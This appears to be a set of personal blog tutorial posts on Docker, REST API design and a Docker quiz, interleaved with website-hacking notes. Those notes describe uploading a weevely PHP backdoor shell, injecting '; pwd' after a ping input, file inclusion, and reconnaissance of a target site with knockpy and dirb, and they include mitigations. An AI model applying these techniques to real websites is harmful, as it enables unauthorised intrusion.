Dockerizing

if we want to create images we need a file: Dockerfile.

It is a sort of assembler of different pieces. Each of this piece is a layer

It also specifies how the container will be built

SINTAX

FROM

Each Dockerfile must start with FROM.

It specifies the imagine from which to start. For instance:

FROM alpine:latest

ARG

In some case it is possible to add an variable to pass as an argument to the FROM command

for instance:

ARG IMG_VERSION=latest
FROM alpine:${IMG_VERSION}

RUN

RUN command allows to execute one o more instructions, defined in bash command, in a new layer.

Adding in this way an immutable block to the image

CMD

CMD is the default instruction to execute the Container.

Basically it means that at the run of the container this instruction will be executed.

It is executed every time the container starts.

it is like the RUN command but the difference is that the RUN command is executed during the build, the CMD command is not included into the build, but it is executed every time the container is started.

Let’s try to create an image

create a folder in which we will create our artifacts

mkdir dockerfolder

inside this folder create the file Dockerfile

nano Dockerfile

and inside the file past this content:

ARG VERSION=3.8

FROM alpine:$VERSION

LABEL maintainer="gf@fconsulting.tech"

ARG VERSION

# RUN command in bash mode
RUN echo $VERSION

# RUN COMMAND in exec mode
RUN ["echo", "$VERSION" ]

CMD [ "/bin/sh"]

Now let’s remain in the same Dockerfile folder and execute the following command:

docker image build .

if everything went well, if you execute a docker image ls you should find the new image.

To create the image with a name and tag we should add -t to the build command, something like this:

docker image build . -t ourfirstimage:0.1
Richardson Maturity Model

it is a model (developed by Leonard Richardson) that breaks down the principal elements of a REST approach into three steps: resource, HTTP verbs and hypermedia controls.

Level 0

The base step for a REST API application that uses HTTP as transport layer and nothing else.

Level 1: Resources

In this case instead of calling a generic service we call a more specialised resource service.

For instance, instead of calling “/bookHotel” and passing all information about our booking (hotel, dates, …) we should call ‘/book/hotel/date”

Level 2: HTTP verbs

In the level 2 we use HTTP methods correctly:

GET, to retrieve information (it helps also to manage client caching)

POST and PUT to create/update information, the only real difference is about idempotency:

  • PUT is for idempotency. It means that you could call the PUT service multiple time without creating the object multiple time (so theoretically for update)
  • POST is not used with idempotent service, it means that if you cal a POST service multiple time the object is created multiple times (so theoretically for insert)

When a new object is created (with PUT or POST) the server has to replay with a 201 and a url indicating where to get this new resource using the GET.

Moreover the response code 409 seems a good choice to indicate that someone else has already updated the resource in an incompatible way. It’s better than a 200 with a message string.

Finally the DELETE should be used to remove objects.

Level 3: Hypermedia controls

In the 3rd level, the server not only sends back to the client the data or object state, but also some other link to some action/service the client can call/use for that object.

For instance, if the client call /book/hotel/date, the response could contain also the link to pay that booking, or the link for the room details, and so on. This allows the client to be more independent from the url or from the services of the server.

Docker CLI

Image list installed on your machine

docker image ls

Download docker image

docker image pull <docker image name>

Remove a docker image

docker image rm <docker image name or hash code>

Execute a container:

docker container run <docker image name>

Show running containers:

docker container ls

Show all container, also the one that are not running in that moment:

docker container ls --all

Remove a container

docker container rm <container name>

Start and stop container:

docker container start <container name>
docker container stop <container name>
Website hack – discovering vulnerabilities

File upload

The easy type of vulnerability, because a php o python or other type of file could be uploaded and, once called can represent a backdoor on server machine.
For instance, if the server knows php, then through a program call e weevly, a php shell can be created (by weevly) and uploaded. From that moment it’s enough to get the URL of the uploaded php shell and through weevly we can connect to the server (starting from the folder where the shell has been saved).

Command execution vulnerability

This type of vulnerability allows to execute OS command on the target server.

When a function in the webpage allows to execute OS command (a ping for instance)
we can add a “;” after the command executed adding a second command.
For instance, in a page that allows to do a ping, after the IP address we can add “; pwd”

Local/Remote file inclusion

it allows to read files outside www directory
When a webpage includes, using URL, another page we can include, using relative path, other files on the server, and their content will be displayed.
Same happens in case the webserver allows to include remote file. In that case we can include a file made by us, and available remotely, which could contain a command tha will be executed when we include the remote file

Mitigation

File Upload

Always check the content type (and not the extension) of the file uploaded (images/media,…)

Code execution

Don’t use it or filter the input

File inclusion

Prevent remote file inclusion
Use static file inclusion and not dynamic one.

Docker Images

Docker Images (DI) are like Classes for java, and defines a Docker Container.

DI is not one element but It is a set of (reusable) layers. Each layers is a service/program/OS/file.

For instance, when we pull an image we get a result like this:

giuseppefanuzzi@Giuseppes-MacBook-Pro ~ % docker pull mysql      
Using default tag: latest
latest: Pulling from library/mysql
46ef68baacb7: Pull complete
94c1114b2e9c: Pull complete
ff05e3f38802: Pull complete
41cc3fcd9912: Pull complete
07bbc8bdf52a: Pull complete
6d88f83726a9: Pull complete
cf5c7d5d33f7: Pull complete
9db3175a2a66: Pull complete
feaedeb27fa9: Pull complete
cf91e7784414: Pull complete
b1770db1c329: Pull complete
Digest: sha256:15f069202c46cf861ce429423ae3f8dfa6423306fbf399eaef36094ce30dd75c
Status: Downloaded newer image for mysql:latest
docker.io/library/mysql:latest

DI are built in Layers. layers will receive an ID (SHA256)

Images ids are represented with SHA256 values derived based on his SHA256 layers.

DI are immutables, once built the files can’t be modified.

The hash value of an image is referred as “tag’ name.

When we pull an image normally we specify his name and sometimes his tag

For instance:

The REPOSITORY column represents the name.

The image tag name is the couple NAME:TAG.

For instance “hello-world:latest”

Docker Hello world

After having installed docker on your operating system (with Windows you need a Linux VM) we can try to say our first hello world typing

docker run hello-world

This will end up with a lot of interesting things to learn.

First of all on how to run a container: docker run <containername>

Then, in the output of this command we can see that, if the container is not found locally, docker client runtime will try to download the image it from his repository (docker hub). Then it will create the container starting from the downloaded image.

the second time you execute the same command it will find the container locally avoiding to download it again.

Preliminary steps to get information about target website

Do you want to hack a wesite?

Follow these steps first, to gather few information about it.

Try to get the following:

  • IP address
  • Domain info
  • Technology used in n the website (programming language, db, …)
  • Other website on the same server
  • DNS records
  • Unlisted files, subdomain, etc

IP address

So we can start to use whois lookup (https://who.is/, https://whois.domaintools.com/), to find information about the domains and the owner

Technologies

To know about technologies used on the website we can check with netcraft website (https://www.netcraft.com/tools/)

DNS record

To get DNS information user the website https://www.robtex.com/

Other website on the same server

In some cases a website is hosted inside a server in which are hosted many other website. So if you can access to your target website, you can try to access to some other website on that server. Basically the all the website on the same server have the same IP address.
robtext.com can show them. Or also Bing can show them, just look for the IP address of the target website and the search result will show all the other websites hosted on the server.

Subdomain

To know subdomains could help to find extra info about the target website.
To know the different subdomain we can use a Linux app called knock (you need python installed).

git clone https://github.com/guelfoweb/knock.git
cd knock
pip3 install -r requirements.txt

python3 knockpy.py <targetwebsite>

And the result will be the list of all subdomains

Unlisted files and folder

To find folder and files could be very helpful because they can contain user, password or other important and sensitive info.
To discover files and folder exposed on the website we can use a tool named “dirb”. It’s a Linux app which uses the brute force to discover them. It has a list of names that will be used to find hidden folder and files.
This list from dirb contains many default file name like robot.txt and config.ini which can contains files that the target website owner doesn’t want to index to search emgine or the db configuration.

REST API Contraints

Is your architecture RESTFul?

An architecture could be REST Like or RESTish

To be RESTFull an architecture should follow 6 rules, known as RESTFul Architectures Contraints:

  • Client – Server architectural principle
  • Uniform interface, that is the use of well-defined communication contract between the client and the server
  • Statelessness, the server must not manage the state of the application
  • Caching, the server controls the caching of response using HTTP header for caching
  • Layered system, multiple layer managed independently
  • Code on demand (optional), it means that the server could send to client also some code that could be executed by the client

Based on the rules above, an architecture could have 4 levels/score, from 0 to 3 (Richardson Maturity level)

Client – Server

It’s basically about the separation of the concerns (SoC).

It’s an architectural principle used in programming to separate an application into units, with minimal overlapping between the functions of each individual unit.

So Client and Server are not sharing any code and they are not executed in the same process.

Server doesn’t call directly the Client, and viceversa. They are decoupled. There is no dependency between them.

Client and Server can change without impacting each other.

Uniform Interface

Client and server shares a common technical interface.

An interface is a technical contract for communication between client and server, that’s nothing about business constraint.

the contract is defined by HTTP method and media types.

The advantage is that it decouples totally client and server. They are 100% technologically independent to each other.

the 4 guiding principles

  1. identity of the resource (uri/url), the client can call a url to manipulate the resource
  2. representation of the resource, the data can be represented differently and in a different format from how it is managed on the server side
  3. self-descriptive messages, request and response have enough data to process request and response.
    • Server can use content-type, http status code, host (which host is the response coming from)
    • Client can use Accept.
  4. Hypermedia, it means that the server send back to client not only the data but also the action that the client should execute (known as HATEOAS)

Statelessness

Each client request is indipendent

Server receives all info it needs from the client request

Caching

A typical web application can have multiple level of caching.

Local cache, the one managed by the browser.

Shared cache on the gateway and on the application server

The advantages can be performance ones and scalability

Response messages should be explicitly marked as cacheable or non cacheable .

Caching is managed by the server thanks to the http headers.

cache-control header

cache policy directive: who, how long, under what condition. Ex:

cache-control: private;max-age=120

it means that only the client can ask for caching and that the cache will be stored only foe 120 seconds

expire header

This header specifies a fixed date/time for the expiration of a cached resource. For example, 

Expires: Sat, 13 May 2017 07:00:00 GMT 

means that the cached resource expires on May 13, 2017 at 7:00 am GMT

ETag

 A response header that identifies the version of served content according to a token – a string of characters in quotes, e.g., 

"675af34563dc-tr34" – that changes after a resource is modified. If a token is unchanged before a request is made, the browser continues to use its local version.

Layered System

Client-server architecture consists of multiple layer. It’a a one way path: a layer can’t comunicate with the previous layer.

layers can be moved, added, deleted based on needs

What is Docker

Welcome to the world of Docker, where containerization transforms the way we develop, ship, and manage applications.

In this beginner-friendly post, we’ll embark on a journey to understand the fundamental concepts of Docker, setting up Docker on different platforms, and exploring its real-world applications. By the end of this session, you’ll have a solid grasp of what Docker is and how it can revolutionize your software development process.

Understanding Containerization

Containerization is like magic for software developers. It allows you to package an application and its dependencies into a single unit, known as a container. Think of it as a self-contained box that holds everything your app needs to run smoothly, from libraries to system tools. Containers are lightweight, efficient, and highly portable.

A container is

  • an isolated runtime inside of Linux
  • provides a private space under Linux
  • run under any modern Linux kernel

his container has

  • his own process space
  • his own network interface
  • his own disk space

Run as root (inside the container)

Docker vs. Traditional Virtualization

Before Docker, virtualization was the go-to method for running multiple applications on a single server. However, it had its drawbacks. Virtual machines (VMs) are resource-intensive and slower to start. Docker containers, on the other hand, are much more lightweight, as they share the host OS kernel, making them faster and more efficient.

Use Cases for Docker

Docker is incredibly versatile and finds applications across various industries. It’s used for software development, testing, and production deployments. Whether you’re a developer, system administrator, or data scientist, Docker can streamline your workflow and simplify application management.

Setting up Docker

Installing Docker on Various Platforms

Getting started with Docker is easy, regardless of your operating system. Docker provides installation packages for Windows, macOS, and Linux. It’s a matter of a few clicks or commands to have Docker up and running on your machine.

To install Docker on your machin check this post

Exploring Docker Desktop (for Windows and macOS)

For Windows and macOS users, Docker Desktop is a user-friendly tool that simplifies container management. It provides a graphical interface to manage containers, images, and more. It’s a great starting point for those new to Docker.

Docker Versioning and Compatibility

Docker evolves rapidly, with frequent updates and new features. It’s important to understand Docker’s versioning and compatibility matrix to ensure that your containers work seamlessly across different environments.

Docker terminology

Docker Image, representation of a docker container. For instance like a JAR or WAR.

Docker Container, the runtime of Docker. Basically a deployed and running docker image, the instance of the docker image.

Docker Engine, the code which manages Docker stuff. Creates and runs Docker containers

Docker Editions

Docker Enterprise and Community editions

Docker Enterprise, is a Caas (Container as a Service) platform subscription (payed)

Docker Community is a free Docker edition


Question 1: What is containerization?

a) A process of shipping physical containers with software inside
b) A way to package applications and their dependencies
c) A type of virtual machine
d) A tool for managing servers

Correct answer: b) A way to package applications and their dependencies

Question 2: What is a key advantage of Docker containers over traditional virtual machines?

a) Docker containers are more secure
b) Docker containers are larger in size
c) Docker containers share the host OS kernel
d) Docker containers have a GUI

Correct answer: c) Docker containers share the host OS kernel

Question 3: Which of the following is NOT a common use case for Docker?

a) Simplifying application deployment
b) Creating virtual machines
c) Building and testing applications
d) Scaling applications on-demand

Correct answer: b) Creating virtual machines

Question 4: Which platforms does Docker provide installation packages for?

a) Windows, macOS, Linux
b) Windows only
c) macOS only
d) Linux only

Correct answer: a) Windows, macOS, Linux

Question 5: What is Docker Desktop primarily used for?

a) Creating virtual machines
b) Managing Docker containers and images
c) Writing code
d) Playing games

Correct answer: b) Managing Docker containers and images

Question 6: Why is it essential to be aware of Docker’s versioning and compatibility?

a) To ensure your containers work consistently across environments
b) To track the stock market
c) To play the latest video games
d) To learn about new Docker features

Correct answer: a) To ensure your containers work consistently across environments

What is an API

API (Application Programming Interface) are like user interfaces but targeted to be consumed by other applications rather than humans.

This interface defines a contract between provider and consumer.

A contract is the exact structure of the request and response

A bit of story: API format

First API format were:

  • XML RPC (Remote Procedure Call)
  • XML SOAP (Simple Object Access Protocol)

Problem

But … XML is heavy in terms of network traffic, so you couldn’t have large payloads crossing over from the webserver to the clients.

XML parsing is CPU and memory intensive

REST Json

Because of previous problems a new exchange format started to be used:

Rest (Representational State Transfer) JSON (Javascript Object Notation)

RESTful

REST stands for REpresentational STate, which means a set of attribute that an object/thing/entity has in a certain moment. This state is managed by a backend system

Rest is not a specific technology, is not a standard

An API is restful when the API has been built using the RESTful architectural style and it follows the principles for RESTful APIs.

HTTP is the preferred protocol to use API with

TYPES OF API

REST API Consumer

  • Private or Internal (part of the same organization)
  • Public or External (outside of the organization)
  • Partner (trusted relationship with the organization)

REST API TYPES

  • Private API, for private consumer
  • Public/External API for public/external consumer
  • Parter API, for partner consumer

There is no particular difference in coding or design these different APIs. What it changes is that they need different aspect in the management of Security, documentation, access request and SLA.

API Security

Private API, consumer are internal and so known (trusted developers). So we can use:

  • Basic auth
  • proprietary schemes

For public and partner API it’s not possible to trust developer, So we can use:

  • key/secret
  • OAuth

Documentation

In case of Partner and private API we are in a “controlled environment”, so no formal documentation

In the public API we talk about uncontrolled environment, we don’t know about unformal documentation, so we need to publish the documentation on a developer portal (which is a good practice also for the other types)

Access Request

for private and partner API, because of controlled environment we can ask it through emails of internal ticketing/process

In case of public API, uncontrolled environment, it’s a good idea to have request for access through a developer portal (which is a good practice also for the other types)

SLA Management

SLA stands for Service Level Agreement, and specifies which service to expect from a service provider and which are the conditions.

Because of API are sort of contracts, consumer and provider has to agree on the quality and condition of the service, for instance up time 99%, throughput 20 calls per seconds and support by email